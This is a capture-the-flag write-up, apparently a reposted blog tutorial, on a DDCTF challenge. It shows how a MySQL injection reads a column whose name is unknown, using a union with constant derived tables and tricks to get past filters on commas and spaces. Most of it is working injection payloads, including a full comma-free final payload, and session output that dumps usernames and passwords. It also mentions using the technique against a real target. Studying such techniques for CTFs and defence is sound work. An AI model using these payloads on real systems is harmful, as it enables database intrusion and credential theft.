How to bypass unknown field names in MySQL

Preface

This article covers the fifth question of DDCTF and the technique it calls for: reading a column whose name you cannot discover. I reproduced the steps on a local MySQL instance; the idea is simple and clear, so it is worth sharing. The details follow.

Implementation ideas

The challenge filters spaces and commas. Spaces can be replaced with other characters that MySQL's parser treats as whitespace, URL-encoded as %0a, %0b, %0c, %0d or %a0, or avoided altogether by wrapping terms in parentheses. Commas can be avoided with join (to build a column list out of derived tables instead of a comma-separated select list) and with LIMIT n OFFSET m in place of LIMIT m,n.

The name of the column that holds the flag is unknown, and the challenge also blocks lookups against information_schema.columns (the table name is filtered even when hex-encoded), so the column names cannot be enumerated. A union query still works in that situation, as follows:

The idea is to make the flag appear under a column name we control, so it can be selected without ever learning the real one. A cross product of constant derived tables, (select 1)a,(select 2)b,(select 3)c,(select 4)d, has columns named 1, 2, 3 and 4; union the target table onto it and the union's result set takes those names, so the real table's rows become addressable as e.1 ... e.4 through an outer alias.

Sample code:

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------------+
| 1 | 2     | 3        | 4                 |
+---+-------+----------+-------------------+
| 1 | 2     | 3        | 4                 |
| 1 | admin | admin888 | [email protected] |
| 2 | test  | test123  | [email protected] |
| 3 | cs    | cs123    | [email protected] |
+---+-------+----------+-------------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------------+
| 4                 |
+-------------------+
| 4                 |
| [email protected] |
| [email protected] |
| [email protected] |
+-------------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
+-------------------+
| 4                 |
+-------------------+
| [email protected] |
+-------------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
    -> union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------------+----------+----------+-------------------+
| id                | username | password | email             |
+-------------------+----------+----------+-------------------+
| 1                 | admin    | admin888 | [email protected] |
| [email protected] | 1        | 1        | 1                 |
+-------------------+----------+----------+-------------------+
2 rows in set (0.04 sec)
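The session above proves the alias trick, but every statement in it still contains commas, which the challenge filters. The following is an added example, not part of the original write-up, that rewrites the same three steps without a single comma, using the join and LIMIT ... OFFSET substitutions from the "Implementation ideas" section. It assumes the article's four-column table user (id, username, password, email) and that the wanted value is in the fourth column; the step-3 payload shape is the author's, only the comma-free plumbing is new.

```sql
-- Added example (not from the original article). Assumes a table `user`
-- with four columns and that the value we want sits in the fourth one.

-- Step 1: four "known" column names 1..4 built with JOIN instead of commas.
-- Derived tables joined without an ON clause form a cross join, so this
-- yields a single row whose columns are named 1, 2, 3 and 4.
select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d;

-- Step 2: UNION the real table under those names, then address the fourth
-- column through the outer alias e. LIMIT 1 OFFSET 3 replaces LIMIT 3,1.
select e.4
from (select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d
      union select * from user) e
limit 1 offset 3;

-- Step 3: the final payload. The stolen value rides in the first column of
-- the injected UNION branch; the filler columns g, h, i are joined rather
-- than listed with commas, so the statement contains no comma at all.
select * from user where id=1
union select * from
  (select e.4
   from (select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d
         union select * from user) e
   limit 1 offset 3) f
  join (select 1)g join (select 1)h join (select 1)i;
```

To send step 3 through the filter, URL-encode every space as %0a (or one of the other whitespace bytes listed earlier) before placing it after id=1 in the injection point. Two checks before relying on the offset: a UNION without ORDER BY does not guarantee row order, so confirm on the target that OFFSET 3 really lands on the row you want, and if the server rejects the unquoted all-digit reference e.4, use the backtick-quoted form e.`4`, which is the documented syntax for identifiers made only of digits.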

Summarize

That is the whole technique: instead of naming the flag's column, give the result set column names of your own through a union with a derived table of constants, then read the wanted column through that alias with LIMIT ... OFFSET. Before using it against a real target, remember that the row order of a UNION without ORDER BY is not guaranteed, so the offset must be verified there, and that the unquoted reference e.4 works in the session shown but the backtick-quoted e.`4` is the documented form for an all-digit identifier. I hope this helps with your study or work. If you have any questions, leave a message. Thank you for your support of 123WORDPRESS.COM.
